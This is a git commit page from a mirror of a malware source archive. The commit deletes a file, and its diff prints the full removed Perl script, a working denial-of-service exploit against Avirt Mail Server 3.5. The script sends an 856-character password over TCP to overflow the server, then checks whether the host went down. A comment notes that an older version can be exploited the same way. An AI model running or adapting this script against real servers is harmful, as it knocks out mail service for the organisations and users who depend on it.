mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-19 18:06:10 +00:00
Delete DoS.Perl.Avirt
na
This commit is contained in:
parent
1224dd2cd4
commit
f3abc5bee8
@ -1,47 +0,0 @@
|
|||||||
|
|
||||||
# Example for a possible DOS-attack against Avirt Mail Server ver3.5.
|
|
||||||
# There need to be 856 characters to overflow Server.
|
|
||||||
# Example : Trying example.com...
|
|
||||||
# Connected to example.com.
|
|
||||||
# Escape character is '^]'.
|
|
||||||
# +OK aVirt Mail POP3 Server Ready
|
|
||||||
# user fuckup
|
|
||||||
# +OK
|
|
||||||
# pass [856 characters]
|
|
||||||
# Overflow
|
|
||||||
# Hint : Avirt Mail Server ver3.3a has the same problem after 856
|
|
||||||
# characters (but then you can exploit it)
|
|
||||||
|
|
||||||
use IO::Socket;
|
|
||||||
|
|
||||||
print "Possible DOS-attack against Avirt Mail Server ver3.5\n";
|
|
||||||
print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
|
|
||||||
|
|
||||||
if (not $ARGV[1]) {
|
|
||||||
print "Usage: $0 [host] [username]\n\n";
|
|
||||||
exit(0);
|
|
||||||
}
|
|
||||||
|
|
||||||
sub connecthost {
|
|
||||||
$host = IO::Socket::INET->new ( Proto => "tcp",
|
|
||||||
PeerAddr => $ARGV[0],
|
|
||||||
PeerPort => "25",) or die "Can't open connection to $ARGV[0] because $!\n";
|
|
||||||
$host->autoflush(1);
|
|
||||||
}
|
|
||||||
|
|
||||||
$bufferoverflow .= "A" x 856;
|
|
||||||
|
|
||||||
print "\nOpen connection...\n";
|
|
||||||
&connecthost;
|
|
||||||
print "Sending characters...\n";
|
|
||||||
print $host "user $ARGV[1]\n";
|
|
||||||
print $host "pass $bufferoverflow\n";
|
|
||||||
print "close connection...\n";
|
|
||||||
close $host;
|
|
||||||
|
|
||||||
print "\nTesting...\n";
|
|
||||||
&connecthost("\nThe host $ARGV[0] is vulnerable to this attack.\n");
|
|
||||||
close $host;
|
|
||||||
die "The host $ARGV[0] is not vulnerable to this attack.\n";
|
|
||||||
|
|
||||||
# by arbon(arbon@gmx.de)
|
|
Loading…
Reference in New Issue
Block a user